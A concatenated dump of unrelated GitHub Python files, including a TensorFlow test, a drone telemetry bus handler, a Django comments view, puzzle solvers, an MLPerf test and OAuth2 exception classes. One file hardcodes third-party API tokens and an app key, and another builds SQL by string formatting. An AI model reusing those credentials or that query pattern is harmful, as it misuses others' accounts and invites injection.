tf.sigmoid(tf.matmul(activations0, weights1))\n\n loss_op = tf.reduce_mean(tf.square(tf.transpose(y) - activations1))\n\n parameters = [weights0, weights1]\n gradients = tf.gradients(loss_op, parameters)\n\n update_op = tf.group(*[\n tf.assign(param, param - grad) \\\n for param, grad in zip(parameters, gradients)\n ])\n\n tf.set_random_seed(67)\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n with trange(10000) as pbar_epoch:\n for _ in pbar_epoch:\n _, loss = sess.run([update_op, loss_op])\n pbar_epoch.set_description('loss: {:.8f}'.format(loss))\n\nif __name__ == '__main__':\n main()\n","repo_name":"jimfleming/differentiation","sub_path":"tf_test.py","file_name":"tf_test.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"71"} +{"seq_id":"21940553713","text":"import logging\nfrom sport.control_code import SportControlCode\n\nfrom sport.frame import FrameDecoder, FrameEncoder\nfrom sport.physical_id import PhysicalId\nfrom util.uart_pumper import UartPumper\n\n_logger = logging.getLogger(\"sport_pumper\")\n\n\n# The Sport bus is managed by the FrSky receiver. It cycles through a sequence of physical IDs, transmitting an\n# invitation for each ID in turn to transmit. It pauses for about 12ms after each invite, giving the device with the\n# current ID a chance to transmit.\n# Simple devices just transmit their own data during their transmission slot and are uninterested in the data\n# transmitted by other devices. However, devices can also listen out for what each other transmits and use this as a\n# mechanism to communicate between themselves.\n# Important: the physical ID identifies a device - when invited to transmit, a given device can write data to the bus\n# and this data starts with a frame ID. The frame ID identifies the type of data and a device can use a different ID\n# each time its given an opportunity to transmit, e.g. it might transmit a current value one time, voltage the next\n# and temperature the next.\nclass SportPumper(UartPumper):\n _BAUD_RATE = 57600\n\n def __init__(self, tx, rx):\n super().__init__(tx, rx, self._BAUD_RATE, echo=True)\n self._frame_decoder = FrameDecoder()\n self._frame_encoder = FrameEncoder()\n self._frame_listener = None\n self._subscribe_ids = {}\n self._publish_ids = {}\n self._has_physical_id = False\n\n def add_subscriber(self, physical_id, subscriber):\n self._subscribe_ids[physical_id] = subscriber\n\n def add_publisher(self, physical_id, publisher):\n self._publish_ids[physical_id] = publisher\n\n def _consume(self, b, is_clear):\n if b == SportControlCode.START:\n self._has_physical_id = False\n elif not self._has_physical_id:\n self._has_physical_id = True\n physical_id = b\n # Check if we want to listen for data published by another device during this slot.\n self._frame_listener = self._subscribe_ids.get(physical_id)\n if self._frame_listener:\n self._frame_decoder.reset()\n else:\n # Check if we want to publish data during this slot.\n self._handle_publish(physical_id, is_clear)\n elif self._frame_listener:\n frame = self._frame_decoder.decode(b)\n if frame:\n if frame is not FrameDecoder.INVALID_FRAME:\n self._frame_listener(frame)\n self._frame_listener = None\n else:\n _logger.debug(\"ignoring 0x%02X\", b)\n\n def _handle_publish(self, physical_id, is_clear):\n write_frame = self._publish_ids.get(physical_id)\n\n if not write_frame:\n return\n\n if is_clear():\n send = write_frame(self._frame_encoder.get_frame())\n if send:\n encoded_frame = self._frame_encoder.encode()\n self._write(encoded_frame)\n else:\n # This could happen if we're reading too slowly or if some other device has stolen this slot.\n _logger.error(\n \"%s slot is not clear for writing\", PhysicalId.name(physical_id)\n )\n","repo_name":"george-hawkins/drone-protocols","sub_path":"lib/sport/sport_pumper.py","file_name":"sport_pumper.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"13987482733","text":"from django.shortcuts import render, redirect\n\n# Create your views here.\nfrom mainapp.models import NewsPost\nfrom .models import CommentsPost\nfrom .forms import CommentsPostForm\nfrom accounts.models import CustomUser\n\n\nfrom hitcount.models import HitCount\nfrom hitcount.views import HitCountMixin\n\n\ndef post_details(request, pk):\n post = NewsPost.objects.get(id=pk)\n # comment_author = CustomUser.objects.get(id=slug)\n user = request.user\n # Counting number of comments\n qty_comment = CommentsPost.objects.filter(post=post.id).count()\n # Count number of views\n hit_count = HitCount.objects.get_for_object(post)\n hit_count_response = HitCountMixin.hit_count(request, hit_count)\n # Posting last three posts\n lastThreeNews = NewsPost.objects.order_by('-date')[:3]\n\n # Write comment\n new_comment=None\n comment_form = CommentsPostForm()\n if request.method == 'POST':\n comment_form = CommentsPostForm(request.POST)\n if comment_form.is_valid():\n parent_obj = None\n try:\n parent_id = int(request.POST.get('parent_id'))\n except:\n parent_id = None\n if parent_id:\n parent_obj = CommentsPost.objects.get(id=parent_id)\n if parent_obj:\n parent_comment = comment_form.save(commit=False)\n parent_comment.parent = parent_obj\n \n new_comment = comment_form.save(commit=False)\n # author = CustomUser.objects.filter(email=user.email).first()\n new_comment.post = post\n # new_comment.comment_author = author\n \n new_comment.save()\n # return redirect('post_details',id=slug)\n return redirect('post_details',post.id)\n else:\n comment_form = CommentsPostForm()\n\n context = {\n 'comment_form':comment_form,\n 'post':post,\n 'qty_comment':qty_comment,\n 'lastThreeNews':lastThreeNews,\n 'hit_count':hit_count,\n 'hit_count_response':hit_count_response,\n 'new_comment':new_comment,\n\n # 'viewrCount':viewrCount\n # 'popular_posts':popular_posts\n }\n return render(request, 'post-details.html', context)","repo_name":"Khasan712/NewsBlog","sub_path":"commentsUser/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"31527129986","text":"def reconnaissance(un, sept, quatre, huit, liste5):\n segments = {i: None for i in range(1, 8)}\n segments[1] = etape1(sept, un)\n perms2s4 = etape2(un, quatre)\n perms1s4s7 = etape3(liste5)\n perms4s7 = perms1s4s7.difference({segments[1]})\n segments[2], segments[4], segments[7] = etape4(perms2s4, perms4s7)\n segments[6] = etape5(liste5,\n segments[2],\n segments[4],\n segments[7],\n segments[1])\n segments[3] = etape6(un, segments[6])\n segments[5] = etape7(huit, segments)\n return segments\n\n\ndef etape1(sept, un):\n for c in sept.difference(un):\n return c\n\n\ndef etape2(un, quatre):\n perms2s4 = quatre.difference(un)\n return perms2s4\n\n\ndef etape3(liste5):\n return liste5[0].intersection(liste5[1]).intersection(liste5[2])\n\n\ndef etape4(s2s4, s4s7):\n ss4 = s2s4.intersection(s4s7)\n ss2 = s2s4.difference(ss4)\n ss7 = s4s7.difference(ss4)\n for e in ss4: s4 = e\n for e in ss2: s2 = e\n for e in ss7: s7 = e\n return s2, s4, s7\n\n\ndef etape5(liste, s2, s4, s7, s1):\n for chiffre in liste:\n if s2 in chiffre and s4 in chiffre and s7 in chiffre:\n ss6 = chiffre.difference({s1, s2, s4, s7})\n for e in ss6:\n s6 = e\n return s6\n\n\ndef etape6(un, s6):\n for c in un.difference(s6):\n return c\n\n\ndef etape7(huit, segments):\n ens = set()\n for v in segments.values():\n if v:\n ens.add(v)\n for c in huit.difference(ens):\n return c\n\n\ndef base(s):\n mabase = {}\n mabase[tuple(sorted([s[1], s[2], s[3], s[5], s[6], s[7]]))] = 0\n mabase[tuple(sorted([s[3], s[6]]))] = 1\n mabase[tuple(sorted([s[1], s[3], s[4], s[5], s[7]]))] = 2\n mabase[tuple(sorted([s[1], s[3], s[4], s[6], s[7]]))] = 3\n mabase[tuple(sorted([s[2], s[3], s[4], s[6]]))] = 4\n mabase[tuple(sorted([s[1], s[2], s[4], s[6], s[7]]))] = 5\n mabase[tuple(sorted([s[1], s[2], s[4], s[5], s[6], s[7]]))] = 6\n mabase[tuple(sorted([s[1], s[3], s[6]]))] = 7\n mabase[tuple(sorted([s[1], s[2], s[3], s[4], s[5], s[6], s[7]]))] = 8\n mabase[tuple(sorted([s[1], s[2], s[3], s[4], s[6], s[7]]))] = 9\n return mabase\n\n\ndef main(fichier):\n with open(fichier) as fh:\n somme = 0\n for ligne in fh:\n chiffres = ligne.strip().split('|')[0].split()\n a_reconnaitre = ligne.strip().split('|')[1].split()\n liste_ens_cinq = []\n for c in chiffres:\n if len(c) == 2:\n un = set(list(c))\n elif len(c) == 3:\n sept = set(list(c))\n elif len(c) == 4:\n quatre = set(list(c))\n elif len(c) == 5:\n liste_ens_cinq.append(set(list(c)))\n elif len(c) == 7:\n huit = set(list(c))\n dico_seg = reconnaissance(un, sept, quatre, huit,\n liste_ens_cinq)\n ma_base = base(dico_seg)\n s = \"\"\n for chiffre in a_reconnaitre:\n cle = tuple(sorted(list(chiffre)))\n s += str(ma_base[cle])\n somme += int(s)\n return somme\n\n\nprint(main(\"jeu2.txt\"))\n","repo_name":"cobacdavid/aoc2021","sub_path":"day08/pb2.py","file_name":"pb2.py","file_ext":"py","file_size_in_byte":3261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"14267576287","text":"import pickle\n\nbase_dir = '/data1/icse-todo-reminder/data_split/'\n\nwith open(base_dir + 'anchor_samples_dict.pkl', 'rb') as handler:\n anchor_samples = pickle.load(handler)\n\nwith open(base_dir + 'positive_samples_dict.pkl', 'rb') as handler:\n positive_samples = pickle.load(handler)\n\nwith open(base_dir + 'negative_samples_dict.pkl', 'rb') as handler:\n negative_samples = pickle.load(handler)\n\nwith open('./anchor_samples', 'w') as fa, \\\n open('./positive_samples', 'w') as fp, \\\n open('./negative_samples', 'w') as fn:\n\n # for k, v in anchor_samples.items():\n for i in range(len(anchor_samples)):\n # print(k)\n # print(v)\n print(i)\n if i in anchor_samples:\n anchor_todo_comment_statement = anchor_samples[i]['anchor_todo_comment_statement']\n anchor_todo_context = anchor_samples[i]['anchor_todo_context']\n fa.write(anchor_todo_comment_statement + '\\t' + anchor_todo_context)\n fa.write('\\n')\n\n positive_todo_comment_statement = positive_samples[i]['positive_todo_comment_statement']\n positive_todo_context = positive_samples[i]['positive_todo_context']\n fp.write(positive_todo_comment_statement + '\\t' + positive_todo_context)\n fp.write('\\n')\n\n negative_todo_comment_statement = negative_samples[i]['negative_todo_comment_statement']\n negative_todo_context = negative_samples[i]['negative_todo_context']\n fn.write(negative_todo_comment_statement + '\\t' + negative_todo_context)\n fn.write('\\n')\n\nprint(\"Finished!\")\n\n\n","repo_name":"TDPatcher/TDPatcher","sub_path":"model_train/0_Data_Prepare.py","file_name":"0_Data_Prepare.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"73096675431","text":"import asyncio\nfrom .command_pattern import CommandPattern\nfrom typing import List\n\n\n\"\"\"\nmessage handler has three main functions\n\n1. create a handler to a pattern (decorator)\n2. run all handlers asynchronously if they match\n3. run a single handler if it matches\n\"\"\"\n\nclass MessageHandler:\n def __init__(self):\n self.handlers = []\n\n def create_handler(self, pattern: str):\n # return a decorator function which takes their\n # function and adds it to the handlers as tuple\n # (pattern : CommandPattern, handleFunction : function)\n\n # translate the pattern\n command_pattern = CommandPattern(pattern)\n\n def decorated_handler(pattern_handler):\n self.handlers.append((command_pattern, pattern_handler))\n return pattern_handler\n\n return decorated_handler\n\n async def run_handlers(self, message, arguments: List[str]):\n for command_pattern, pattern_handler in self.handlers:\n pattern_object = command_pattern.gen_object(arguments)\n\n if pattern_object is not None:\n await pattern_handler(message, **pattern_object)\n\n\n\"\"\"\nI want to be able to do:\n\nmessage_handler = MessageHandler()\n\n...\n\n@client.createHandler('word something ')\nasync def function_name(message, variable, other_variable):\n await do_something()\n\"\"\"\n\nif __name__ == '__main__':\n message_handler = MessageHandler()\n\n @message_handler.create_handler('list something')\n async def poop(message):\n await message.channel.send('hi')\n","repo_name":"jamseblew/discord-bot","sub_path":"scripts/handlers/message_handler.py","file_name":"message_handler.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"71954937511","text":"#!/usr/bin/python\n# encoding: utf-8\n\nfrom multiprocessing import Process, Queue\nimport time\n# 多进程间的通信\n\ndef p_put(q, *arg):\n q.put(arg)\n print(\"has put %s\" % arg)\n\ndef p_get(q, *arg):\n print(\"%s wait to get ....\" % arg)\n print(q.get())\n print(\"%s got it \" % arg)\n\n\nif __name__ == '__main__':\n q = Queue()\n p1 = Process(target=p_put, args=(q, \"p1\", ))\n p2 = Process(target=p_get, args=(q, \"p2\", ))\n p1.start()\n time.sleep(2)\n p2.start()\n","repo_name":"emperwang/python_operation","sub_path":"base/mprocess/process_communicate.py","file_name":"process_communicate.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"21604072379","text":"from __future__ import print_function\nfrom absl import app\nimport mlperf_loadgen\n\n\ndef load_samples_to_ram(query_samples):\n del query_samples\n return\n\n\ndef unload_samples_from_ram(query_samples):\n del query_samples\n return\n\n\ndef issue_query(query_samples):\n responses = []\n for s in query_samples:\n responses.append(mlperf_loadgen.QuerySampleResponse(s.id, 0, 0))\n mlperf_loadgen.QuerySamplesComplete(responses)\n\n\ndef flush_queries():\n pass\n\n\ndef main(argv):\n del argv\n settings = mlperf_loadgen.TestSettings()\n settings.scenario = mlperf_loadgen.TestScenario.SingleStream\n settings.mode = mlperf_loadgen.TestMode.PerformanceOnly\n\n sut = mlperf_loadgen.ConstructSUT(issue_query, flush_queries)\n qsl = mlperf_loadgen.ConstructQSL(\n 1024 * 1024, 1024, load_samples_to_ram, unload_samples_from_ram)\n mlperf_loadgen.StartTest(sut, qsl, settings)\n mlperf_loadgen.DestroyQSL(qsl)\n mlperf_loadgen.DestroySUT(sut)\n\n\nif __name__ == \"__main__\":\n app.run(main)\n","repo_name":"mlcommons/inference","sub_path":"loadgen/tests/perftests_null_sut.py","file_name":"perftests_null_sut.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":971,"dataset":"github-code","pt":"71"} +{"seq_id":"1577011711","text":"import psycopg2\n\nconn = psycopg2.connect(\n host=\"localhost\",\n database=\"iris\",\n user=\"postgres\",\n password=\"1997713\"\n)\n\n\ndef insert(values):\n cursor = conn.cursor()\n select_query = \"insert into iris_table(sepal_length, sepal_width, petal_length, petal_width, variety)\" \\\n \" values({},{},{},{},\\'{}\\')\".format(*values)\n cursor.execute(select_query)\n # role_records = cursor.fetchall()\n # print(role_records)\n conn.commit()\n select_all()\n\n\ndef select_all():\n cursor = conn.cursor()\n select_query = \"select * from iris_table\"\n cursor.execute(select_query)\n role_records = cursor.fetchall()\n print(role_records)\n\n","repo_name":"leylakrz/review_python","sub_path":"connect_db.py","file_name":"connect_db.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"14063025910","text":"# class Stack:\n\n# def __init__(self):\n# self.items = []\n\n# def isEmpty(self):\n# return self.items == []\n\n# def push(self, item):\n# self.items.append(item) \n\n# def pop(self):\n# return self.items.pop()\n\n# def peek(self):\n# return self.items[len(self.items)-1]\n\n# def count(self):\n# return len(self.items) \n\nfrom stack import Stack\n\ndef divBy2(decNumber, base):\n remStack = Stack()\n\n while decNumber > 0:\n rem = decNumber % base\n remStack.push(rem)\n decNumber = decNumber // base\n\n binString = ''\n while not remStack.isEmpty(): \n binString = binString + str(remStack.pop())\n return binString\n\nprint(divBy2(4,8)) ","repo_name":"iamdarshan7/Data-Struct-Algo","sub_path":"stack/binary.py","file_name":"binary.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"35376463682","text":"import itertools\n\n#start dice donde empieza\n#step el paso\ncounter = itertools.count(start = 5,step= 2.5)\n\ndata = [100,200,300,400]\n#los mete a una tupla con un numero\ndaily_data = list(zip(itertools.count(), data))\n\nprint(daily_data)\n\nprint(next(counter))\nprint(next(counter))\nprint(next(counter))\nprint(next(counter))\n\nletters = [\"a\",\"b\",\"c\",\"d\"]\nnumbers = [0,1,2,3,4,5]\nnames = [\"Corey\", \"Nicole\"]\n\n#podemos hacer combinaciones y permutaciones\nresult = itertools.combinations(letters, 2)\n\nfor item in result:\n\tprint (item)\n\n#combinamos distintas listas\ncombined = itertools.chain(letters, numbers, names)\n\nfor item in combined:\n\tprint(item)\n\n\n#GroupBy\n\npeople = [\n {\n 'name': 'John Doe',\n 'city': 'Gotham',\n 'state': 'NY'\n },\n {\n 'name': 'Jane Doe',\n 'city': 'Kings Landing',\n 'state': 'NY'\n },\n {\n 'name': 'Corey Schafer',\n 'city': 'Boulder',\n 'state': 'CO'\n },\n {\n 'name': 'Al Einstein',\n 'city': 'Denver',\n 'state': 'CO'\n },\n {\n 'name': 'John Henry',\n 'city': 'Hinton',\n 'state': 'WV'\n },\n {\n 'name': 'Randy Moss',\n 'city': 'Rand',\n 'state': 'WV'\n },\n {\n 'name': 'Nicole K',\n 'city': 'Asheville',\n 'state': 'NC'\n },\n {\n 'name': 'Jim Doe',\n 'city': 'Charlotte',\n 'state': 'NC'\n },\n {\n 'name': 'Jane Taylor',\n 'city': 'Faketown',\n 'state': 'NC'\n }\n]\n\ndef get(person):\n\treturn person[\"state\"]\n\ndog = itertools.groupby(people, get)\n\nd = {}\nfor key, group in dog:\n\td[key] = len(list(group))\n\nprint(d)\n\nmax_key = max(d, key=d.get)\n\nprint(max_key)\n\t","repo_name":"AngelloDavincii/02-Aprendiendo","sub_path":"compu.py","file_name":"compu.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"75073351270","text":"import os, sys\nimport time, httplib\n# from gi.repository import GObject\n\n\n# def get_parent_path(folderpath, level=1):\n# parent_path = os.path.realpath(folderpath)\n# while(level > 0):\n# parent_path = os.path.dirname(parent_path)\n# level -= 1\n# return parent_path\n\n# def get_http_time():\n# try:\n# conn = httplib.HTTPConnection(\"www.beijing-time.org\")\n# conn.request(\"GET\", \"/time.asp\")\n# response = conn.getresponse()\n# if response.status == 200:\n# result = response.read()\n# data = result.split(\"\\r\\n\")\n# print data#['t0=new Date().getTime();', 'nyear=2014;', 'nmonth=5;', 'nday=7;', 'nwday=3;', 'nhrs=13;', 'nmin=32;', 'nsec=2;']\n# year = data[1][len(\"nyear\")+1 : len(data[1])-1]\n# month = data[2][len(\"nmonth\")+1 : len(data[2])-1]\n# day = data[3][len(\"nday\")+1 : len(data[3])-1]\n# hrs = data[5][len(\"nhrs\")+1 : len(data[5])-1]\n# bjtime = \"%s-%s-%s %s hour\" % (year, month, day, hrs)\n# print bjtime\n# except:\n# print \"00-00-00 00\"\n\ndef get_local_format_time():\n '''\n year-month-day hour:minute:second\n 2014-05-07 13:51:30\n '''\n local_date = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))\n return local_date\n\n# def get_local_normal_time():\n# '''\n# year month day hour minute\n# 201405071351\n# '''\n# local_date = time.strftime('%Y%m%d%H%M', time.localtime(time.time()))\n# return local_date\n\n# WEATHER_URL = 'http://m.weather.com.cn/data/%s.html'\nWEATHER_URL = 'http://m.weather.com.cn/atad/%s.html'\nWEATHER_URL1 = 'http://www.weather.com.cn/data/sk/%s.html'\nWEATHER_URL2 = 'http://www.weather.com.cn/data/cityinfo/%s.html'\nPM25_URL = 'http://pm25.in/api/querys/pm2_5.json?city='\nWEATHER_URL_bak = 'http://api.k780.com:88/?app=weather.today&weaid=%s&appkey=13342&sign=94e85c3e0c85d051cca43fcada6881b9&format=json'\n# attention: PM2.5 APPKey From Email:kobe24_lixiang@126.com\nTOKEN = '&token=yqpL46DpUeYqcqsox7bM'\n# attention: PM2.5 APPKey From Email:xiangli@ubuntukylin.com\n#TOKEN = '&token=wYpDvD83HMDy553JqFNx'\n\n# PROJECT_ROOT_DIRECTORY = os.path.abspath(\n # os.path.dirname(os.path.dirname(os.path.realpath(sys.argv[0]))))\n# DATA_PATH = os.path.join(PROJECT_ROOT_DIRECTORY, \"data\")\n# ICON_PATH = os.path.join(PROJECT_ROOT_DIRECTORY, \"icons\")\n# SERVER_IP = '192.168.30.156'#'192.168.1.105'#'192.168.30.156'#'192.168.30.231'#\n# SERVER_URL = 'http://' + SERVER_IP + ':8888/RPC2'\n# QSETTING_PATH = 'ubuntukylin/weaher-app'\n# QSETTING_FILE = 'ubuntukylin-weaher-app'\n","repo_name":"CrankyPants123/weather-server","sub_path":"api/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"34285192546","text":"T = []\r\nn = eval(input('Insira o tamanho do seu vector: '))\r\nfor k in range (n):\r\n valor = eval(input('Insira um valor: '))\r\n T.append(valor)\r\nprint(T)\r\ndef soma(T, tamanho):\r\n if tamanho == 0:\r\n return 0\r\n else:\r\n return T[tamanho - 1] + soma(T, tamanho - 1)\r\n#EXECUÇÃO\r\nsoma(T, len(T))\r\nprint('Soma =',soma(T, len(T)))","repo_name":"6kenji/Python---Exercises---Resolutions","sub_path":"meus programas/alpr/FUNÇÕES RECURSIVAS/FUNÇÃO RECURSIVA PARA PREENCHER VALORES DE UM VECTOR.py","file_name":"FUNÇÃO RECURSIVA PARA PREENCHER VALORES DE UM VECTOR.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"27930627068","text":"#! /usr/bin/env python\n\nfrom __future__ import division\n\nfrom timeside.core.processor import get_processor, ProcessPipe\n#from timeside.plugins.decoder.file import FileDecoder\nfrom timeside.plugins.decoder.aubio import AubioDecoder as FileDecoder\n\nimport unittest\nfrom unit_timeside import TestRunner\nfrom tools import tmp_file_sink\nfrom timeside.core.tools.test_samples import samples\n\n@unittest.skip('skip for now')\nclass TestTranscodingStreaming(unittest.TestCase):\n \"Test transcoding and streaming\"\n\n def setUp(self):\n self.source = samples[\"sweep.wav\"]\n self.test_duration = True\n self.test_channels = True\n self.filesize_delta = None\n self.expected_sample_rate = None\n\n def testMp3(self):\n \"Test conversion to mp3\"\n self.encoder_id = 'mp3_encoder'\n self.filesize_delta = 156\n\n def testOgg(self):\n \"Test conversion to ogg\"\n self.encoder_id = 'vorbis_encoder'\n\n def testOpus(self):\n \"Test conversion to opus\"\n self.encoder_id = 'opus_encoder'\n self.expected_sample_rate = 48000\n\n def testWebM(self):\n \"Test conversion to webm\"\n self.encoder_id = 'webm_encoder'\n self.test_duration = False # webmmux encoder with streamable=true\n # does not return a valid duration\n\n def tearDown(self):\n decoder = FileDecoder(self.source)\n encoder_cls = get_processor(self.encoder_id)\n\n file_extension = '.' + encoder_cls.file_extension()\n\n self.target_filesink = tmp_file_sink(prefix=self.__class__.__name__,\n suffix=file_extension)\n\n self.target_appsink = tmp_file_sink(prefix=self.__class__.__name__,\n suffix=file_extension)\n\n encoder = encoder_cls(self.target_filesink, streaming=True)\n pipe = (decoder | encoder)\n\n\n with open(self.target_appsink, 'w') as f:\n for chunk in pipe.stream():\n f.write(chunk)\n \n decoder_encoded = FileDecoder(self.target_filesink)\n\n pipe2 = ProcessPipe(decoder_encoded)\n pipe2.run()\n \n\n import os\n filesink_size = os.path.getsize(self.target_filesink)\n appsink_size = os.path.getsize(self.target_appsink)\n\n os.unlink(self.target_filesink)\n os.unlink(self.target_appsink)\n #print decoder.channels(), decoder.samplerate(), written_frames\n #print media_channels\n\n if self.test_channels:\n self.assertEqual(decoder.channels(), decoder_encoded.channels())\n else:\n self.assertEqual(2, decoder_encoded.channels()) # voaacenc bug ?\n\n if not self.expected_sample_rate:\n self.expected_sample_rate = decoder.samplerate()\n self.assertEqual(self.expected_sample_rate,\n decoder_encoded.samplerate())\n\n if self.test_duration:\n self.assertAlmostEqual(decoder.input_duration,\n decoder_encoded.input_duration,\n delta=0.2)\n self.assertAlmostEqual(filesink_size, appsink_size,\n delta=self.filesize_delta)\n \nif __name__ == '__main__':\n unittest.main(testRunner=TestRunner())\n","repo_name":"yomguy/TimeSide","sub_path":"tests/test_transcoding_streaming.py","file_name":"test_transcoding_streaming.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":358,"dataset":"github-code","pt":"71"} +{"seq_id":"18855392719","text":"from typing import List, Tuple\n\nimport numpy as np\nfrom pyrep.objects.proximity_sensor import ProximitySensor\nfrom pyrep.objects.shape import Shape\nfrom rlbench.backend.conditions import (DetectedSeveralCondition,\n NothingGrasped, ConditionSet)\nfrom rlbench.backend.spawn_boundary import SpawnBoundary\nfrom rlbench.backend.task import Task\nfrom rlbench.const import colors\n\n\nclass BlockPyramid(Task):\n\n def init_task(self) -> None:\n self.blocks = [Shape('block_pyramid_block%d' % i) for i in range(6)]\n self.distractors = [Shape(\n 'block_pyramid_distractor_block%d' % i) for i in range(6)]\n success_detectors = [ProximitySensor(\n 'block_pyramid_success_block%d' % i) for i in range(3)]\n\n cond_set = ConditionSet([\n DetectedSeveralCondition(self.blocks, success_detectors[0], 3),\n DetectedSeveralCondition(self.blocks, success_detectors[1], 2),\n DetectedSeveralCondition(self.blocks, success_detectors[2], 1),\n NothingGrasped(self.robot.gripper)\n ])\n self.register_success_conditions([cond_set])\n self.register_graspable_objects(self.blocks + self.distractors)\n self.spawn_boundary = SpawnBoundary(\n [Shape('block_pyramid_boundary%d' % i) for i in range(4)])\n\n def init_episode(self, index: int) -> List[str]:\n\n color_name, color_rgb = colors[index]\n for obj in self.blocks:\n obj.set_color(color_rgb)\n\n color_choice = np.random.choice(\n list(range(index)) + list(range(index + 1, len(colors))),\n size=1, replace=False)[0]\n name, rgb = colors[color_choice]\n for obj in self.distractors:\n obj.set_color(rgb)\n self.spawn_boundary.clear()\n for ob in self.blocks + self.distractors:\n self.spawn_boundary.sample(\n ob, min_distance=0.08, min_rotation=(0.0, 0.0, -np.pi / 4),\n max_rotation=(0.0, 0.0, np.pi / 4))\n\n return ['stack %s blocks in a pyramid' % color_name,\n 'create a pyramid with the %s objects' % color_name,\n 'make a pyramid out of %s cubes' % color_name,\n 'position the %s blocks in the shape of a pyramid' % color_name,\n 'use the %s blocks to build a pyramid' % color_name]\n\n def variation_count(self) -> int:\n return len(colors)\n\n def base_rotation_bounds(self) -> Tuple[List[float], List[float]]:\n return [0, 0, - np.pi / 8], [0, 0, np.pi / 8]\n","repo_name":"stepjam/RLBench","sub_path":"rlbench/tasks/block_pyramid.py","file_name":"block_pyramid.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","stars":839,"dataset":"github-code","pt":"71"} +{"seq_id":"35186302105","text":"\nfrom __future__ import annotations\nfrom typing import TYPE_CHECKING, ClassVar, Any\nif TYPE_CHECKING:\n from typing import Mapping\n from ..http.response import Response\n from .token import Token\n\nimport re\n\nfrom ..exceptions import ArgExcMixin\n\nclass ArgExc(ArgExcMixin):\n pass\n\n\nclass UnknownTokenType(ArgExc):\n \"\"\"An exception for when the client receives an unexpected token type.\n\n This exception class is provided for user code to raise.\n\n Typically the client will expect that the `token_type` field in a token\n response has the value `bearer`, and the token should be rejected if not.\n See `section 7.1`_ of the OAuth2 specification.\n\n .. _`section 7.1`: https://datatracker.ietf.org/doc/html/rfc6749#section-7.1\n \"\"\"\n\n def __init__(self, arg: object = None, *, token: Token) -> None:\n super().__init__(arg)\n self.token: Token = token\n\nclass OAuth2ResponseError(ArgExc):\n \"\"\"An OAuth2 response error as detailed in the OAuth2 spec.\n\n For more information see `section 5.2`_ of the OAuth2 specification.\n\n .. _`section 5.2`: https://tools.ietf.org/html/rfc6749#section-5.2\n \"\"\"\n ERROR_NAME: ClassVar[str] = ''\n\n def __init__(self, arg: object = None, *,\n error_name: str = '',\n description: str = '',\n help_uri: str = '') -> None:\n super().__init__(arg)\n self.error_name: str = error_name\n self.description: str = description\n self.help_uri: str = help_uri\n\n def get_default_message(self) -> str:\n if self.description:\n return repr(self.description)\n return ''\n\nclass TokenServerResponseError(OAuth2ResponseError):\n \"\"\"Error responses that from the token server.\"\"\"\n\nclass TokenServerResponseErrorTypes:\n class InvalidRequest(TokenServerResponseError):\n ERROR_NAME: ClassVar[str] = 'invalid_request'\n\n class InvalidClient(TokenServerResponseError):\n ERROR_NAME: ClassVar[str] = 'invalid_client'\n\n class InvalidGrant(TokenServerResponseError):\n ERROR_NAME: ClassVar[str] = 'invalid_grant'\n\n class UnauthorizedClient(TokenServerResponseError):\n ERROR_NAME: ClassVar[str] = 'unauthorized_client'\n\n class UnsupportedGrantType(TokenServerResponseError):\n ERROR_NAME: ClassVar[str] = 'unsupported_grant_type'\n\n class InvalidScope(TokenServerResponseError):\n ERROR_NAME: ClassVar[str] = 'invalid_scope'\n\nclass UnrecognizedTokenServerResponseError(TokenServerResponseError):\n pass\n\ntoken_server_response_error_by_error_name: Mapping[str, type[TokenServerResponseError]] = {\n cls.ERROR_NAME: cls\n for cls in [\n TokenServerResponseError,\n TokenServerResponseErrorTypes.InvalidRequest,\n TokenServerResponseErrorTypes.InvalidClient,\n TokenServerResponseErrorTypes.InvalidGrant,\n TokenServerResponseErrorTypes.UnauthorizedClient,\n TokenServerResponseErrorTypes.UnsupportedGrantType,\n TokenServerResponseErrorTypes.InvalidScope,\n ]\n}\n\ndef raise_for_token_server_response_error(json_dict: Any) -> None:\n error_name = json_dict.get('error')\n if error_name is None:\n return\n\n cls = token_server_response_error_by_error_name.get(error_name, UnrecognizedTokenServerResponseError)\n raise cls(\n error_name=error_name,\n description=json_dict.get('error_description', ''),\n help_uri=json_dict.get('error_uri', ''),\n )\n\nclass ResourceServerResponseError(OAuth2ResponseError):\n \"\"\"Error responses that from the resource server (i.e., the API).\"\"\"\n\nclass ResourceServerResponseErrorTypes:\n class InvalidRequest(ResourceServerResponseError):\n ERROR_NAME: 